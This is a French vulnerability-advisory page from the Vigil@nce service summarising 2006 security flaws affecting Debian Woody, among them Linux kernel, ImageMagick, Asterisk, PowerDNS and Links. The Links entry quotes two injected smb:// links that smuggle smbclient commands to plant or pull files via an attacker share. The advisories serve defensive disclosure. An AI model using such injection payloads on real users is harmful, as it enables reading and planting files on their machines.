L'équipe Vigil@nce veille les vulnérabilités publiques qui affectent votre parc informatique, puis propose des correctifs sécurité, une base et des outils pour y remédier.

Vulnérabilités informatiques de Debian Woody

avis de vulnérabilité informatique CVE-2006-6060

Noyau Linux : boucle infinie de __find_get_block_slow

Synthèse de la vulnérabilité

Un attaquant local peut monter une image NTFS illicite afin de mener un déni de service.
Produits concernés : Debian, Fedora, Linux.
Gravité : 1/4.
Conséquences : déni de service du serveur.
Provenance : shell utilisateur.
Date création : 22/11/2006.
Références : CVE-2006-6060, DSA-1304-1, MOKB-19-11-2006, VIGILANCE-VUL-6339.

Description de la vulnérabilité

Le système de fichiers NTFS est supporté par Linux.

Lorsque le système de fichiers est malformé une boucle infinie se produit dans la fonction __find_get_block_slow().

Cette erreur permet ainsi à un attaquant local de mener un déni de service.
Bulletin Vigil@nce complet... (Essai gratuit)

annonce de vulnérabilité informatique CVE-2006-6058

Noyau Linux : boucle infinie de minix_bmap

Synthèse de la vulnérabilité

Un attaquant local peut monter une image minix illicite afin de mener un déni de service.
Produits concernés : Debian, Fedora, Linux, Mandriva Corporate, Mandriva Linux, openSUSE, RHEL.
Gravité : 1/4.
Conséquences : déni de service du serveur.
Provenance : shell utilisateur.
Date création : 22/11/2006.
Références : CVE-2006-6058, DSA-1436-1, DSA-1504-1, FEDORA-2007-3751, FEDORA-2007-3837, MDKSA-2007:226, MDKSA-2007:232, MDVSA-2008:008, MDVSA-2008:112, MOKB-17-11-2006, RHSA-2007:0672-01, SUSE-SA:2007:059, VIGILANCE-VUL-6337.

Description de la vulnérabilité

Le système de fichiers minix est supporté par Linux.

Lorsque le système de fichiers est malformé, une boucle infinie se produit dans la fonction minix_bmap().

Cette erreur permet ainsi à un attaquant local de mener un déni de service.
Bulletin Vigil@nce complet... (Essai gratuit)

vulnérabilité informatique CVE-2006-5868

ImageMagick : vulnérabilités via une image SGI

Synthèse de la vulnérabilité

Un attaquant peut créer une image SGI illicite conduisant à un déni de service ou à l'exécution de code sur les machines des utilisateurs de ImageMagick.
Produits concernés : Debian, Mandriva Corporate, Mandriva Linux, RHEL, ProPack, TurboLinux.
Gravité : 2/4.
Conséquences : accès/droits utilisateur, déni de service du client.
Provenance : document.
Date création : 22/11/2006.
Références : 20070201-01-P, BID-21185, CVE-2006-5868, DSA-1213-1, MDKSA-2006:223, RHSA-2007:0015-01, TLSA-2007-5, VIGILANCE-VUL-6335.

Description de la vulnérabilité

La bibliothèque libMagick implémente les différentes fonctions utilisées par ImageMagick.

Plusieurs débordements peuvent se produire lors de l'ouverture d'une image SGI.

Un attaquant peut donc inviter l'utilisateur à ouvrir une image SGI avec ImageMagick afin de mener un déni de service ou de faire exécuter du code sur sa machine.
Bulletin Vigil@nce complet... (Essai gratuit)

bulletin de vulnérabilité CVE-2006-5989

Apache : débordement de mod_auth_kerb

Synthèse de la vulnérabilité

Un débordement de 4 octets peut se produire dans mod_auth_kerb.
Produits concernés : Apache httpd, Debian, Fedora, Mandriva Corporate, RHEL.
Gravité : 2/4.
Conséquences : accès/droits utilisateur.
Provenance : client intranet.
Date création : 21/11/2006.
Références : 206736, BID-21214, CVE-2006-5989, DSA-1247-1, FEDORA-2006-1341, MDKSA-2006:218, RHSA-2006:0746-01, VIGILANCE-VUL-6333.

Description de la vulnérabilité

Le module mod_auth_kerb permet d'authentifier les utilisateurs de Apache httpd via Kerberos.

La fonction der_get_oid() de spnegokrb5/der_get.c contient (code simplifié) :
  malloc(len * sizeof(components));
au lieu de :
  malloc((len+1) * sizeof(components));
Ainsi, la taille allouée est trop faible de "sizeof(components)" octets (4 octets).

Un attaquant du réseau peut donc provoquer un débordement afin de mener un déni de service, et éventuellement de faire exécuter du code.
Bulletin Vigil@nce complet... (Essai gratuit)

alerte de vulnérabilité CVE-2006-5778

linux-ftpd, netkit : changement de répertoire en root

Synthèse de la vulnérabilité

Après authentification, le répertoire courant de l'utilisateur est changé avec les droits root.
Produits concernés : Debian.
Gravité : 2/4.
Conséquences : lecture de données, création/modification de données.
Provenance : compte utilisateur.
Date création : 21/11/2006.
Références : 384454, CVE-2006-5778, VIGILANCE-VUL-6331.

Description de la vulnérabilité

Le paquetage linux-ftpd contient le serveur FTP NetKit.

Après authentification de l'utilisateur, le processus de ce serveur :
 - se déplace dans le home directory de l'utilisateur avec chdir(), puis
 - change d'identité avec setgid()/setuid().
Ainsi, le changement de répertoire s'effectue avec les droits root, au lieu de ceux de l'utilisateur.

Dans le cas particulier où l'utilisateur peut modifier un lien symbolique situé dans le chemin de son home directory, il peut alors accéder dans un répertoire protégé. Si les fichiers de ce répertoire ne sont pas protégés, il peut les télécharger ou les uploader.
Bulletin Vigil@nce complet... (Essai gratuit)

vulnérabilité CVE-2005-4802

flexbackup : corruption de fichier

Synthèse de la vulnérabilité

Un attaquant local peut modifier un fichier lors de l'utilisation de flexbackup.
Produits concernés : Debian, Unix (plateforme) ~ non exhaustif.
Gravité : 2/4.
Conséquences : accès/droits utilisateur, création/modification de données.
Provenance : shell utilisateur.
Nombre de vulnérabilités dans ce bulletin : 2.
Date création : 21/11/2006.
Références : CVE-2005-4802, CVE-2006-4802-ERROR, DSA-1216-1, VIGILANCE-VUL-6330.

Description de la vulnérabilité

Le programme flexbackup est un logiciel de sauvegarde.

Ce programme utilise des fichiers temporaires de manière non sûre.

Un attaquant local peut créer un lien symbolique pour altérer un fichier avec les droits de flexbackup.

Dans l'un des cas, le fichier temporaire contient des commandes shell. L'attaquant peut alors faire exécuter des commandes avec les droits de flexbackup.
Bulletin Vigil@nce complet... (Essai gratuit)

avis de vulnérabilité CVE-2006-5444 CVE-2006-5445

Asterisk : exécution de code et déni de service

Synthèse de la vulnérabilité

Deux vulnérabilités de Asterisk permettent à un attaquant distant d'exécuter du code ou de mener un déni de service.
Produits concernés : Asterisk Open Source, Debian, openSUSE.
Gravité : 3/4.
Conséquences : accès/droits utilisateur, déni de service du service.
Provenance : client intranet.
Nombre de vulnérabilités dans ce bulletin : 2.
Date création : 16/11/2006.
Références : BID-20617, BID-20835, CVE-2006-5444, CVE-2006-5445, DSA-1229-1, SUSE-SA:2006:069, VIGILANCE-VUL-6324, VU#521252.

Description de la vulnérabilité

Le logiciel de téléphonie Asterisk comporte deux vulnérabilités.

Un débordement d'entier de la fonction get_input() de chan_skinny.c permet à un attaquant distant de faire exécuter du code. [grav:3/4; BID-20617, CVE-2006-5444, VU#521252]

Une vulnérabilité de channels/chan_sip.c permet à un attaquant de mener un déni de service en consommant des ressources système. [grav:3/4; BID-20835, CVE-2006-5445]
Bulletin Vigil@nce complet... (Essai gratuit)

vulnérabilité CVE-2006-5925

Links : transfert de fichiers via smbclient

Synthèse de la vulnérabilité

Un attaquant peut transférer des fichiers avec la machine de l'utilisateur de Links.
Produits concernés : Debian, Fedora, Mandriva Linux, openSUSE, RHEL, Unix (plateforme) ~ non exhaustif.
Gravité : 2/4.
Conséquences : lecture de données, création/modification de données.
Provenance : serveur internet.
Date création : 15/11/2006.
Date révision : 16/11/2006.
Références : BID-21082, CVE-2006-5925, DSA-1226-1, DSA-1228-1, DSA-1240-1, FEDORA-2006-1277, FEDORA-2006-1278, MDKSA-2006:216, RHSA-2006:0742-01, SUSE-SR:2006:027, VIGILANCE-VUL-6320.

Description de la vulnérabilité

Le programme Links permet de naviguer sur le web en mode texte.

Lorsque l'utilisateur clique sur un lien de la forme "smb://serveur/fichier", le programme smbclient est appelé pour télécharger le fichier.

Cependant, les paramètres passés à smbclient ne sont pas correctement purgés, ce qui permet à un attaquant d'inclure plusieurs commandes. Par exemple, pour créer un fichier sur la machine de l'utilisateur :
  smb://attaquant/partage" lcd tmp; put fichier_créé ; exit;
Pour lire un fichier de la machine de l'utilisateur :
  smb://attaquant/partage" lcd tmp; get HOHO fichier_lu; exit;

Cette vulnérabilité permet ainsi à un attaquant d'échanger des fichiers avec la machine de l'utilisateur acceptant de cliquer sur un lien smb dans Links. Les autres programmes partageant le même source, comme Elinks, sont aussi vulnérables.
Bulletin Vigil@nce complet... (Essai gratuit)

avis de vulnérabilité informatique CVE-2006-4251

PowerDNS : buffer overflow via TCP

Synthèse de la vulnérabilité

Un attaquant peut faire exécuter du code sur PowerDNS lorsqu'il est configuré en mode récursif.
Produits concernés : Debian, openSUSE, Unix (plateforme) ~ non exhaustif.
Gravité : 3/4.
Conséquences : accès/droits utilisateur, déni de service du service.
Provenance : client intranet.
Date création : 15/11/2006.
Références : BID-21037, CVE-2006-4251, DSA-1211-1, SUSE-SA:2006:070, VIGILANCE-VUL-6319.

Description de la vulnérabilité

Le serveur DNS PowerDNS peut être configuré en mode autoritaire ou récursif.

Lorsque PowerDNS est en mode récursif, et reçoit une requête TCP de plus de 64koctet, il la stocke tout de même dans un tableau de 64koctet. Un débordement se produit donc.

Un attaquant, autorisé à mener des requêtes récursives, peut donc faire exécuter du code sur le serveur.
Bulletin Vigil@nce complet... (Essai gratuit)

bulletin de vulnérabilité informatique CVE-2006-6056

Noyau Linux : déni de service de superblock_doinit

Synthèse de la vulnérabilité

Un attaquant local peut monter une image HFS illicite afin de mener un déni de service lorsque SELinux est activé.
Produits concernés : Debian, Fedora, Linux, Mandriva Corporate, Mandriva Linux, NLD, OES, openSUSE, RHEL, SLES.
Gravité : 1/4.
Conséquences : déni de service du serveur.
Provenance : shell utilisateur.
Date création : 15/11/2006.
Références : CVE-2006-6056, DSA-1304-1, MDKSA-2007:060, MDKSA-2007:078, MOKB-14-11-2006, RHSA-2007:0014-01, SUSE-SA:2006:079, VIGILANCE-VUL-6318.

Description de la vulnérabilité

Le système de fichiers HFS (Hierarchical File System) provient de Mac OS.

Lorsque le système de fichiers est malformé, et si SELinux est employé, une erreur se produit dans la fonction superblock_doinit().

Cette erreur permet ainsi à un attaquant local de mener un déni de service.
Bulletin Vigil@nce complet... (Essai gratuit)
Notre base de données contient d'autres bulletins. Vous pouvez utiliser un essai gratuit pour les consulter.

Consulter les informations sur Debian Woody :